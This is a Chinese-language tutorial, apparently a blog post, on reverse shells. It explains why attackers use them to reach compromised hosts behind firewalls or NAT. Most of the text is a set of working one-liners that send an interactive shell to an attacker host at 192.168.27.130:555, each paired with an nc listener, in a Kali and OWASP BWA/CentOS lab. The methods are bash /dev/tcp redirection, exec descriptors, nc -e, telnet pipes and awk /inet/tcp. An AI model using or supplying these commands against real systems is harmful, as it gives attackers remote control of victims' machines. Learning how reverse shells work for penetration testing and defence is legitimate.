目录
文章目录
前言
一、常用的反弹shell命令
1.使用Bash进行反弹
2.使用exec执行shell的方式
3.其他方式
4.使用nc进行反弹
5.使用Telnet进行反弹
6.使用awk进行反弹
(1)什么是反弹shell?
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
(2)为什么要反弹shell?
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?
有如下情况:
1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2.目标机器的ip动态改变,你不能持续控制。
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。
kali作为攻击主机,owasp作为被入侵主机,只要能在入侵主机上正常运行Linux命令就能实现反弹,利用Bash命令重定向。
(1).在kali上启动端口监听
nc -lvp 555 #这个端口可以是任意端口,只要不是被占用或者防火墙阻挡都可以用。
(2)在owasp上运行反弹命令
bash -i >& /dev/tcp/192.168.27.130/555 0>&1
命令解析:
bash -i #打开一个交互的bash
>& #将标准错误输出合并 并定向到标准输出,也可以写成&>
/dev/tcp/192.168.27.130/555 # 意为调用scoket,建立socket连接,其中192.168.27.130为要反弹到的主机,555为端口。
0>&1 #标准输入重定向到标椎输出,实现你与反弹出来的shell的交互,可以接受用户的输入,0>&1和0<&1是一样的作用
(3)反弹成功在kali上执行命令
root@owaspbwa:~# pwd
pwd
/root
root@owaspbwa:~# ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:f8:36:e7
inet addr:192.168.27.132 Bcast:192.168.27.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fef8:36e7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:430 errors:0 dropped:0 overruns:0 frame:0
TX packets:116 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:28786 (28.7 KB) TX bytes:15275 (15.2 KB)
Interrupt:18 Base address:0x1400
(1)在kali上执行,监听555端口
nc -lvp 555
(2)在owasp上执行
exec 5<> /dev/tcp/192.168.27.130/555; cat <&5 | while read line; do $line 2>&5 >&5; done
#在owasp上执行完命令,返回kali端是没有任何提示付的符,直接执行命令即可。
(1)在klai上监听555端口
nc -lvp 555
(2)在owasp执行命令
exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/192.168.27.130/555; sh <&196 >&196 2>&196
#执行完返回到kali里也是没有任何提示符,可直接执行命令
(1)在kali上进行端口监听
nc -lvp 555
(2)在centos7上执行反弹命令
nc -e /bin/bash 192.168.27.130 555
#执行完kali没有提示符,直接执行命令即可。
(1)需要在kali上开启两个端口,一个用来输入。一个用来输出。
nc -lvp 444
nc -lvp 555
#打开两个命令窗口同时执行
(2)在centos7上执行命令
telnet 192.168.27.130 444 | /bin/bash | telnet 192.168.27.130 555
#444为输入端口,555作为输出端口,在444端口执行命令,555端口输出结果。centos默认没有安装Telnet服务的要进行安装才能使用
(1)在klai监听端口
nc -lvp 555
(2)在centos上执行命令
awk 'BEGIN{s="/inet/tcp/0/192.168.27.130/555";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
#执行完命令再kali没有任何提示符,直接执行命令即可。